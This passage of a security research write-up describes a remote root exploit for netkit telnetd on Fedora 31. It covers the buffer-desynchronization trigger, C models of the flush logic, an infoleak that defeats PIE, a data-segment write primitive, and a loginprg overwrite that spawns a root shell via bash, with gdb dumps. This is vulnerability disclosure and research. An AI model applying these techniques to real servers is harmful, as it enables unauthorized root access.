|     0 |     1 |     2 |  ...  |  8190 |  8191 |
+-------+-------+-------+-------+-------+-------+
|  IAC  |  WONT |   SB  |  ...  |  ...  |       |
++------+-------+-------+-------+-------++------+
 |                                       |
 +>nbackp                                +>nfrontp

If we send an IAC DO IAC request, a call to send_wont will call output_datalen to add the IAC WONT IAC sequence to netobuf. netflush will be called to make space for these 3 bytes. Suppose write sends less data than requested, say 2 bytes in this case. The situation then becomes:

 netobuf
+-------+-------+-------+-------+-------+-------+
|     0 |     1 |     2 |  ...  |  8190 |  8191 |
+-------+-------+-------+-------+-------+-------+
|  IAC  |  WONT |   SB  |  ...  |  ...  |       |
+-------+-------++------+-------+-------++------+
                 |                       |
                 +>nbackp                +>nfrontp

At this point output_datalen would move past the netflush and recalculate remaining to be 1 and copy 1 byte of data to nfrontp. The situation after the copy is as follows:

 netobuf
+-------+-------+-------+-------+-------+-------+
|     0 |     1 |     2 |  ...  |  8190 |  8191 |
+-------+-------+-------+-------+-------+-------+
|  IAC  |  WONT |   SB  |  ...  |  ...  |  IAC  |
+-------+-------++------+-------+-------+-------++
                 |                               |
                 +>nbackp                        +>nfrontp

As there are still 2 bytes of data to be copied by output_datalen, netflush will be called again. If write sends out all remaining data this time, we end up with the following situation after the netflush:

 netobuf
+-------+-------+-------+-------+-------+-------+
|     0 |     1 |     2 |  ...  |  8190 |  8191 |
+-------+-------+-------+-------+-------+-------+
|  IAC  |  WONT |   SB  |  ...  |  ...  |  IAC  |
++------+-------+-------+-------+-------+-------+
 |
 +>nfrontp
 +>nbackp

Finally output_datalen would copy the remaining 2 bytes of the IAC WONT IAC triplet, leading to:

 netobuf
+-------+-------+-------+-------+-------+-------+
|     0 |     1 |     2 |  ...  |  8190 |  8191 |
+-------+-------+-------+-------+-------+-------+
|  WONT |  IAC  |   SB  |  ...  |  ...  |  IAC  |
++------+-------++------+-------+-------+-------+
 |               |
 +>nbackp        +>nfrontp

If this buffer were to be processed by netclear, the call to nextitem would skip the WONT at index 0 and start processing the IAC we injected at index 1. As nextitem can over-index, if the byte at index 2 is an SB byte, we end up with the situation we desired, that is, an IAC SB sequence in netobuf without a terminating IAC SE sequence.
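The walkthrough above can be replayed with a small model. This is a sketch that assumes output_datalen and netflush behave as described in the text; it is not the telnetd source. The struct, the function names, the NOP padding byte and the short_write field (which makes the first flush "send" only 2 bytes) are all illustrative choices.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define MODEL_BUFSIZ 8192
enum { TN_NOP = 241, TN_SB = 250, TN_WONT = 252, TN_IAC = 255 };

struct model {
    unsigned char netobuf[MODEL_BUFSIZ];
    unsigned char *nfrontp;   /* next free byte */
    unsigned char *nbackp;    /* next byte to send */
    size_t short_write;       /* if nonzero, the next flush sends only this many bytes */
};

/* Model of netflush: "sends" by advancing nbackp, resets once drained. */
static void model_netflush(struct model *m)
{
    size_t n = (size_t)(m->nfrontp - m->nbackp);

    if (m->short_write != 0 && m->short_write < n)
        n = m->short_write;
    m->short_write = 0;       /* only one flush is short in this model */
    m->nbackp += n;
    if (m->nbackp == m->nfrontp)
        m->nbackp = m->nfrontp = m->netobuf;
}

/* Model of output_datalen: flush when the data does not fit, copy what fits. */
static void model_output_datalen(struct model *m, const unsigned char *buf, size_t len)
{
    size_t remaining = MODEL_BUFSIZ - (size_t)(m->nfrontp - m->netobuf);

    while (len > 0) {
        if (len > remaining) {
            model_netflush(m);
            remaining = MODEL_BUFSIZ - (size_t)(m->nfrontp - m->netobuf);
        }
        size_t copied = remaining > len ? len : remaining;
        memmove(m->nfrontp, buf, copied);
        m->nfrontp += copied;
        buf += copied;
        len -= copied;
        remaining -= copied;
    }
}

/* Builds the state of the first diagram, then injects IAC WONT IAC. */
static void short_write_trigger(struct model *m)
{
    static const unsigned char wont_iac[3] = { TN_IAC, TN_WONT, TN_IAC };

    assert(m != NULL);
    memset(m->netobuf, TN_NOP, sizeof m->netobuf);  /* padding, arbitrary filler */
    m->netobuf[0] = TN_IAC;
    m->netobuf[1] = TN_WONT;
    m->netobuf[2] = TN_SB;
    m->nbackp = m->netobuf;
    m->nfrontp = m->netobuf + MODEL_BUFSIZ - 1;     /* one free byte left */
    m->short_write = 2;                             /* first write sends 2 bytes */
    model_output_datalen(m, wont_iac, sizeof wont_iac);
}
```

After short_write_trigger returns, the first three bytes of the model buffer read WONT IAC SB and nfrontp sits at index 2, matching the final diagram.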

2.6.2 Trigger using urgent data

Control over the return value of the non-blocking write is complicated, because it depends on several network-related factors outside our control. Relevant variables include the transmit buffer size, the MTU, the TCP MSS, whether or not TSO is used, and so on. The situation is exacerbated by a timer telnetd uses to close the connection after a certain amount of time: we need that time to fill the remote transmit buffer, which makes this approach even more convoluted.

Thankfully, there is another way to have netflush not drain all data, which involves the use of the neturg pointer. The process is outlined below.

We start with a situation similar to before, where we have sent an IAC DO SB request. This time we follow it with an IAC AO request, and then padding requests to increase nfrontp to 8191. The IAC AO is answered by an IAC DM sequence, as we have seen before in telrcv, and sets neturg to the address of the DM byte in netobuf.
We send an IAC DO IAC request. Remember that this results in a call to send_wont producing IAC WONT IAC, which ends up in output_datalen to add this triplet to netobuf. netflush will be called to make space for these 3 bytes. However, because neturg is not 0, netflush will now use send instead of write and only drain 3 bytes of data.
Now output_datalen will recalculate remaining to be 1, and copy 1 byte of data into netobuf.
At this point netflush will be called again, which will send 1 byte of urgent data. Note that this will increase nbackp to neturg which in turn leads neturg to be set to 0.
As no space has been freed at the tail of the buffer, 0 bytes will be copied, and netflush will be called again. Here it will use a regular blocking write and drain all the remaining data.
The remaining WONT IAC bytes will now be written to netobuf, leading to the sequence WONT IAC SB at the beginning.
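The steps above can be traced with a model that tracks neturg. This is a sketch under the assumption that netflush follows the logic shown at the end of the listing in the previous section (send n-1 bytes normally when more than one byte precedes the urgent mark, otherwise send the remaining byte with MSG_OOB) and that every send succeeds in full. Indices stand in for the nfrontp, nbackp and neturg pointers, and all names are illustrative.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define MODEL_BUFSIZ 8192
enum { TN_NOP = 241, TN_DM = 242, TN_SB = 250, TN_WONT = 252, TN_IAC = 255 };

struct urg_model {
    unsigned char netobuf[MODEL_BUFSIZ];
    size_t front;     /* index form of nfrontp */
    size_t back;      /* index form of nbackp */
    size_t urg;       /* index form of neturg, valid only if has_urg */
    int has_urg;      /* models neturg != 0 */
    int flushes;      /* number of netflush calls */
    int oob_bytes;    /* bytes sent with MSG_OOB */
};

static void urg_netflush(struct urg_model *m)
{
    size_t n = m->front - m->back;

    m->flushes++;
    if (n > 0 && m->has_urg) {
        n = m->urg - m->back;
        if (n > 1)
            n = n - 1;                /* send(net, nbackp, n-1, 0) */
        else
            m->oob_bytes += (int)n;   /* send(net, nbackp, n, MSG_OOB) */
    }
    m->back += n;
    if (m->has_urg && m->back >= m->urg)
        m->has_urg = 0;               /* neturg = 0 */
    if (m->back == m->front)
        m->back = m->front = 0;       /* buffer drained, reset */
}

static void urg_output_datalen(struct urg_model *m, const unsigned char *buf, size_t len)
{
    size_t remaining = MODEL_BUFSIZ - m->front;

    while (len > 0) {
        if (len > remaining) {
            urg_netflush(m);
            remaining = MODEL_BUFSIZ - m->front;
        }
        size_t copied = remaining > len ? len : remaining;
        memmove(m->netobuf + m->front, buf, copied);
        m->front += copied;
        buf += copied;
        len -= copied;
        remaining -= copied;
    }
}

/* IAC WONT SB, IAC DM, padding up to index 8190, then inject IAC WONT IAC. */
static void urgent_trigger(struct urg_model *m)
{
    static const unsigned char wont_iac[3] = { TN_IAC, TN_WONT, TN_IAC };

    assert(m != NULL);
    memset(m->netobuf, TN_NOP, sizeof m->netobuf);  /* padding, arbitrary filler */
    m->netobuf[0] = TN_IAC;
    m->netobuf[1] = TN_WONT;
    m->netobuf[2] = TN_SB;
    m->netobuf[3] = TN_IAC;
    m->netobuf[4] = TN_DM;
    m->front = MODEL_BUFSIZ - 1;
    m->back = 0;
    m->urg = 4;                                     /* index of the DM byte */
    m->has_urg = 1;
    m->flushes = 0;
    m->oob_bytes = 0;
    urg_output_datalen(m, wont_iac, sizeof wont_iac);
}
```

In this model the triplet is written across three flushes: one that drains 3 bytes, one that sends a single urgent byte and clears the urgent mark, and one that drains the rest, after which WONT IAC lands in front of the SB byte.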

This is the configuration we are looking for in order to trigger the bug. The animation below illustrates the previous description:

3 Exploitation

Now that we have seen that we can indeed create a situation in netkit-telnetd that leads to memory corruption, we will investigate exploitability. In doing so we will develop a rudimentary proof-of-concept exploit that will spawn a root shell on a default Fedora 31 installation running netkit-telnetd. This proof of concept will not work against machines that have SELinux enabled, although we are fairly positive a working exploit can be developed against SELinux targets. We will briefly outline some ideas on this in our conclusion.

3.1 Copy primitive control

netkit-telnetd uses a huge number of global or file-scoped variables, including netobuf, which we overflow. The first issue we need to deal with is ensuring nextitem will find an IAC SE pair in order to survive. A tentative glance at the data section layout shows us the following sizes and names:

+---------+--------+-------+---------+--------+-----+-----+---------+
|    8256 |    304 |     8 |       8 |      8 |   4 |  20 |    8192 |
+---------+--------+-------+---------+--------+-----+-----+---------+
| netobuf | slctab | netip | pfrontp | neturg | net | pad | netibuf |
+---------+--------+-------+---------+--------+-----+-----+---------+

It seems opportune to use netibuf to embed the terminating IAC SE sequence. We can do this by simply sending an IAC SE pair, as telrcv will not add anything to netobuf when it encounters an unexpected command byte in TS_IAC state.

If this IAC SE sequence is at the start of netibuf and we use the buffer layout described in the previous section, we would end up copying the range [&netobuf[1], &netibuf[1]] to &netobuf[0]. This is because the first WONT byte in netobuf will not be wanted, and good will point to the start of the buffer. This is a rather inflexible primitive, so the first thing we will investigate is whether we can exert any control over both the destination and the size of the copy.
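To make the distances concrete, the sketch below derives field offsets from the sizes in the layout table and computes the length of the copy. It assumes the fields are contiguous in exactly the order shown, with "pad" covering any alignment gap, and that the copied range ends with the SE byte, as the inclusive range above suggests. The enum and function names are illustrative.

```c
#include <assert.h>
#include <stddef.h>

/* Fields in the order given by the layout table. */
enum layout_field {
    F_NETOBUF, F_SLCTAB, F_NETIP, F_PFRONTP,
    F_NETURG, F_NET, F_PAD, F_NETIBUF, F_COUNT
};

/* Sizes in bytes, copied from the layout table. */
static const size_t field_size[F_COUNT] = { 8256, 304, 8, 8, 8, 4, 20, 8192 };

/* Offset of a field from &netobuf[0], assuming contiguous fields. */
static size_t field_offset(enum layout_field f)
{
    size_t off = 0;

    assert(f < F_COUNT);
    for (int i = 0; i < (int)f; i++)
        off += field_size[i];
    return off;
}

/*
 * Number of bytes copied when thisitem is &netobuf[item_idx] and the
 * IAC SE pair starts at &netibuf[se_idx]; the range includes the SE byte.
 */
static size_t copy_length(size_t item_idx, size_t se_idx)
{
    return field_offset(F_NETIBUF) + se_idx + 2 - item_idx;
}
```

Under these assumptions netibuf starts 8608 bytes after netobuf, and copy_length(1, 0) gives 8609 bytes for the range [&netobuf[1], &netibuf[1]].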

3.1.1 Destination and size control

In order to control the destination of the copy, we need to control good. Likewise, to control the size of the copy we need to control the offset at which nextitem starts processing the IAC SB sequence in netobuf, since the IAC SE sequence is found in netibuf. Using the trigger we discussed, the WONT IAC sequence will always be written at the beginning of netobuf. Although this cannot be avoided, remember that the real issue is the state desynchronization this creates by turning an IAC WONT SB sequence into a WONT IAC SB sequence.

We can propagate this state desynchronization further down netobuf by observing that, just like we turned the IAC WONT SB sequence into WONT IAC SB, we can turn the IAC WONT SB IAC WONT SB sequence into a WONT IAC IAC WONT IAC SB sequence. This can be generalized: we can turn a sequence with n repetitions of IAC WONT SB into a sequence of a single WONT IAC, then (n-1) IAC WONT IAC repetitions, and finally an SB byte. Note that good will not be updated up until the IAC SB sequence, as the other sequences are not wanted.

This means that by adding more or fewer IAC WONT SB sequences and corresponding IAC WONT IAC sequences after desynchronization we control the position of thisitem within netobuf and also length in multiples of 3 at the time of the bcopy.

First, the situation we created in netobuf prior to adding two IAC WONT IAC sequences:

 netobuf
+------+------+------+------+------+------+------+------+------+
|    0 |    1 |    2 |    3 |    4 |    5 |  ... | 8190 | 8191 |
+------+------+------+------+------+------+------+------+------+
|  IAC | WONT |  SB  |  IAC | WONT |  SB  |  ... |  ... |      | 
++-----+------+------+------+------+------+------+------++-----+
 |                                                       |
 +>nbackp                                                +>nfrontp

After these two IAC WONT IAC sequences have been added to netobuf, the situation is as below. Note that when the buffer is processed the IAC IAC sequence will be treated as data, and the IAC SB sequence will result in the condition we were looking for, but this time further into netobuf.

 netobuf
+------+------+------+------+------+------+------+------+------+
|    0 |    1 |    2 |    3 |    4 |    5 |  ... | 8190 | 8191 |
+------+------+------+------+------+------+------+------+------+
| WONT |  IAC |  IAC | WONT |  IAC |  SB  |  ... |  ... |  IAC |
++-----+------+------+------+------++-----+------+------+------+
 |                                  |
 +>nbackp                           +>nfrontp
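The generalization can be checked with a short sketch. It builds the desynchronized byte sequence for n repetitions and walks it with a simplified item scanner that, as an assumption based on the description in this post, treats a non-IAC byte as a 1-byte item, IAC followed by DO, DONT, WILL or WONT as a 3-byte item, and any other IAC pair (including IAC IAC) as a 2-byte item. Both function names are illustrative.

```c
#include <assert.h>
#include <stddef.h>

enum { TN_SB = 250, TN_WILL = 251, TN_WONT = 252, TN_DO = 253, TN_DONT = 254, TN_IAC = 255 };

/*
 * Fill buf with the desynchronized form of n repetitions of IAC WONT SB:
 * WONT IAC, then (n-1) times IAC WONT IAC, then SB. Returns the number
 * of bytes written (3*n), or 0 if n is 0 or the buffer is too small.
 */
static size_t build_desync(unsigned char *buf, size_t cap, size_t n)
{
    size_t i = 0;

    assert(buf != NULL);
    if (n == 0 || cap / 3 < n)
        return 0;
    buf[i++] = TN_WONT;
    buf[i++] = TN_IAC;
    for (size_t k = 1; k < n; k++) {
        buf[i++] = TN_IAC;
        buf[i++] = TN_WONT;
        buf[i++] = TN_IAC;
    }
    buf[i++] = TN_SB;
    return i;
}

/* Index of the first IAC SB pair seen by the simplified scanner, or len. */
static size_t find_iac_sb(const unsigned char *buf, size_t len)
{
    size_t i = 0;

    while (i + 1 < len) {
        if (buf[i] != TN_IAC) {       /* plain data byte */
            i += 1;
            continue;
        }
        switch (buf[i + 1]) {
        case TN_SB:
            return i;
        case TN_WILL: case TN_WONT: case TN_DO: case TN_DONT:
            i += 3;                   /* IAC <verb> <option> */
            break;
        default:
            i += 2;                   /* two-byte command, including IAC IAC */
            break;
        }
    }
    return len;
}
```

For n repetitions the scanner reaches the IAC SB pair at index 3n-2, so each additional repetition moves thisitem three bytes further into netobuf (index 1 for n = 1, index 4 for n = 2 as in the diagram above).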

3.2 Limited data segment infoleak

By controlling the source and length of the copy, we can copy the range from the tail of netobuf up to and including &netibuf[2] to the start of netobuf. This range contains the variables shown in the layout above. When netobuf is next flushed, this copied data will be written to our client socket.

This will include the netip pointer, which is guaranteed to point somewhere in netibuf. Using this leaked pointer and the knowledge of how much data we sent ourselves, we can calculate the start address of netibuf. We know that netibuf is two pages big, and we know whether netip is within the first or the second page based on how much of the data we sent had been processed at the time of the information leak. By rounding the leaked netip value down to a page boundary and, if necessary, subtracting one page, we know the exact address of netibuf in memory. This bypasses PIE, and allows us to determine the addresses of other variables in the data segment if we know their distance from netibuf.
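The address arithmetic is simple enough to write down. The sketch below assumes 4096-byte pages (consistent with the 8192-byte netibuf spanning two pages) and a page-aligned netibuf, which the rounding argument above relies on. The function names and the in_second_page flag are illustrative; the caller would derive that flag from how many bytes had been consumed when the leak happened.

```c
#include <assert.h>
#include <stdint.h>

#define ASSUMED_PAGE_SIZE 4096u

/*
 * Recover the address of netibuf from a leaked netip value. The flag
 * in_second_page must be nonzero when netip had already advanced into
 * the second page of netibuf at the time of the leak.
 */
static uint64_t netibuf_base(uint64_t leaked_netip, int in_second_page)
{
    uint64_t base = leaked_netip & ~(uint64_t)(ASSUMED_PAGE_SIZE - 1);

    if (in_second_page) {
        assert(base >= ASSUMED_PAGE_SIZE);
        base -= ASSUMED_PAGE_SIZE;
    }
    return base;
}

/* Address of another variable at a known signed distance from netibuf. */
static uint64_t var_address(uint64_t netibuf_addr, int64_t distance)
{
    return netibuf_addr + (uint64_t)distance;
}
```

For example, with the layout shown earlier, netobuf would sit at var_address(base, -8608), provided that layout holds for the build in question.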

3.3 Write primitive

The next thing we’re interested in is a write primitive. One of the variables we leaked was pfrontp, which makes a good target as controlling it allows us to write arbitrary data to addresses before &ptyobuf[BUFSIZ-2]. This allows us to corrupt arbitrary data in the data segment, so this primitive can easily be built upon to create more flexible information leaks and write primitives.

3.4 Escalation of privileges

The information leak, in combination with the data segment write primitive we discussed, has tremendous potential for finding further primitives for escalation. Many of the simpler ones are context dependent, but we have included some ideas below.

Corrupt the environ pointer and add LD_PRELOAD before login is executed. This will work well on systems where the attacker has local access.
Target the doopt, dont, will, or wont format strings for leaking or write primitives if fortify so allows.
Investigate more flexible write primitives and information leaks.
Overwrite loginprg and aim for command injection.

3.5 Command injection

One of the simplest ideas is seeing if we can influence how telnetd spawns the login process and control that. There are some drawbacks to this approach, in particular SELinux allowing in.telnetd to only execute the login binary, but for a proof of concept it is suitable due to its simplicity.

Executing the login process is done using the start_login function as seen below. The global character pointer loginprg (referenced on line 629 in the original listing) is used to determine what to execute. On the Fedora 31 build, this variable is far below ptyobuf in the data segment, and therefore we can write it.

The arguments passed to the executed command are not easily under our control, as they are constructed on the stack in argv_stuff using addarg. We note that on the default Fedora 31 build, what is executed uses the following argv array:

argv[0] = loginprg;
argv[1] = "-h";
argv[2] = host;
argv[3] = "-p";
argv[4] = name;

Through the USER environment variable we have easy control over name, although it cannot start with a hyphen (this would be a security issue by itself). This variable can be set through TELOPT_ENVIRON or by corrupting the environ variable in the data segment. We can control host by overwriting remote_host_name. If we point loginprg at bash, the “-h” parameter does not take an argument, so host can be used to pass an additional parameter to bash. A good choice in this case is “-c”, which will execute the command in name. This works because the ‘-h’ argument passed to bash sets the hashing_enabled flag, and the ‘-p’ argument sets the privileged_mode flag. The former flag is harmless, and the latter stops bash from changing the euid, which is convenient. Indeed, executing bash -h -c -p bash will spawn a new shell.

void start_login(const char *host, int autologin, const char *name) {
    struct argv_stuff avs;
    char *const *argvfoo;
    (void)autologin;

    initarg(&avs);

    /*
     * -h : pass on name of host.
     *          WARNING:  -h is accepted by login if and only if
     *                  getuid() == 0.
     * -p : don't clobber the environment (so terminal type stays set).
     *
     * -f : force this login, he has already been authenticated
     */
    addarg(&avs, loginprg);
    addarg(&avs, "-h");
    addarg(&avs, host);
#if !defined(NO_LOGIN_P)
    addarg(&avs, "-p");
#endif
#ifdef BFTPDAEMON
    /*
     * Are we working as the bftp daemon?  If so, then ask login
     * to start bftp instead of shell.
     */
    if (bftpd) {
        addarg(&avs, "-e");
        addarg(&avs, BFTPPATH);
    }
    else
#endif
    {
#if defined (SecurID)
        /*
         * don't worry about the -f that might get sent.
         * A -s is supposed to override it anyhow.
         */
        if (require_SecurID) addarg(&avs, "-s");
#endif
        if (*name=='-') {
            syslog(LOG_ERR, "Attempt to login with an option!");
            name = "";
        }
#if defined (AUTHENTICATE)
        if (auth_level >= 0 && autologin == AUTH_VALID) {
# if !defined(NO_LOGIN_F)
            addarg(&avs, "-f");
# endif
            addarg(&avs, name);
        }
        else
#endif
        {
            if (getenv("USER")) {
                addarg(&avs, getenv("USER"));
                if (*getenv("USER") == '-') {
                    write(1,"I don't hear you!\r\n",19);
                    syslog(LOG_ERR,"Attempt to login with an option!");
                    exit(1);
                }
            }
        }
    }
    closelog();
    /* execv() should really take char const* const *, but it can't */
    /*argvfoo = argv*/;
    memcpy(&argvfoo, &avs.argv, sizeof(argvfoo));
    execv(loginprg, argvfoo);

    syslog(LOG_ERR, "%s: %m\n", loginprg);
    fatalperror(net, loginprg);
}
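The resulting argument vector can be modelled in a few lines. This sketch only mirrors the five-entry argv array listed before the start_login listing and the hyphen check on the user name; it is not a replacement for start_login, and the function name is illustrative.

```c
#include <assert.h>
#include <stddef.h>

/*
 * Fill argv with the five entries from the argv array shown earlier,
 * followed by a NULL terminator. Returns 0 on success, or -1 if name
 * starts with a hyphen, which start_login refuses.
 */
static int build_login_argv(const char *loginprg, const char *host,
                            const char *name, const char *argv[6])
{
    assert(loginprg != NULL && host != NULL && name != NULL && argv != NULL);
    if (name[0] == '-')
        return -1;
    argv[0] = loginprg;
    argv[1] = "-h";
    argv[2] = host;     /* taken from remote_host_name */
    argv[3] = "-p";
    argv[4] = name;     /* taken from the USER environment variable */
    argv[5] = NULL;
    return 0;
}
```

With host set to "-c" and name set to "bash", the vector reads <loginprg> -h -c -p bash, which is the command line discussed above once loginprg refers to bash.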

3.5.1 Rewriting the data segment

As the data segment write primitive we have can only be used once, the easiest option is to write from loginprg all the way up to remote_host_name to get to the command execution outlined previously. This means that we will corrupt the variables on the data segment between loginprg and remote_host_name along the way. In order to avoid undesired side-effects, we have to inspect all variables we have overwritten for consistency. As this work is a proof-of-concept, we will set all memory values between loginprg and remote_host_name to 0, and have cherry-picked the ones that lead to undesired side-effects. This results in the list of values given below, where each entry will be handled specifically. Note that for more reliable exploitation we would have to exhaustively inspect all variables in this range.

(gdb) x/gx &loginprg
0xe0f8 <loginprg>:      0x000000000000a247
(gdb) x/wx &ptyslavefd
0xe2c8 <ptyslavefd>:    0xffffffff
(gdb) x/gx &environ
0xe700 <environ>:       0x0000000000000000
(gdb) x/gx &LastArgv
0x100c0 <LastArgv>:     0x0000000000000000
(gdb) x/64bx &remote_host_name 
0x10100 <remote_host_name>:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x10108 <remote_host_name+8>:   0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x10110 <remote_host_name+16>:  0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x10118 <remote_host_name+24>:  0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x10120 <remote_host_name+32>:  0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x10128 <remote_host_name+40>:  0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x10130 <remote_host_name+48>:  0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x10138 <remote_host_name+56>:  0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00

loginprg: overwritten to point to the command string to execute.
ptyslavefd: overwritten to the original value of ptyslavefd. If this value is incorrect, the login_tty function will call fatalperror.
environ: overwritten to make the getenv("USER") call work in start_login as we need to control the last argument to execv().
LastArgv: overwritten to make the setproctitle function work.
remote_host_name: overwritten with -c\0

One more part of this memory is used as a temporary scratch area that stores the data we want to set pointers to. This includes the LastArgv and environ arrays, the strings inside of them, and the string the new value of loginprg points to. There is not enough space in state_rcsid itself to hold all the temporary data our exploit uses, but the variables that come after state_rcsid are not directly relevant to the code paths traversed in our exploit.

(gdb) x/56bx &state_rcsid
0xe140 <state_rcsid>:           0x24    0x49    0x64    0x3a    0x20    0x73    0x74    0x61
0xe148 <state_rcsid+8>:         0x74    0x65    0x2e    0x63    0x2c    0x76    0x20    0x31
0xe150 <state_rcsid+16>:        0x2e    0x31    0x32    0x20    0x31    0x39    0x39    0x39
0xe158 <state_rcsid+24>:        0x2f    0x31    0x32    0x2f    0x31    0x32    0x20    0x31
0xe160 <state_rcsid+32>:        0x39    0x3a    0x34    0x31    0x3a    0x34    0x34    0x20
0xe168 <state_rcsid+40>:        0x64    0x68    0x6f    0x6c    0x6c    0x61    0x6e    0x64
0xe170 <state_rcsid+48>:        0x20    0x45    0x78    0x70    0x20    0x24    0x00    0x00

4 Conclusion

We have presented a working exploit against Fedora 31 netkit-telnet-0.17 telnetd. Mitigations such as ASLR and PIE have been bypassed by using the bug primitive to create an information leak. Mitigations such as non-executable pages, and theoretically CFI have been bypassed by attacking metadata to change the executable that telnetd executes to log the remote user into the system.

SELinux has not been bypassed, as the current SELinux profile will not allow in.telnetd to execute anything other than the login_exec_t type. This means it is useless to change loginprg to anything that does not belong to this type. One idea would be to see if we can change the arguments passed to loginprg to add a -f flag. Another idea is trying to gain full control over the execution path in order to pass arbitrary arguments to the execv call. Both of these ideas need more flexible information leaks and write primitives. We have verified that at least one more flexible information leak exists that will disclose more of the data segment, but information leaks and write primitives that can reach arbitrary addresses in memory have not yet been pursued. We will leave this as future work to others.

Finally I would like to extend my personal gratitude to everyone that has proof-read this document and added suggestions and corrections. Most of you do not want to be named, but it should be known that your efforts were appreciated. Thank you.

Friday, February 28, 2020

BraveStarr – A Fedora 31 netkit telnetd remote exploit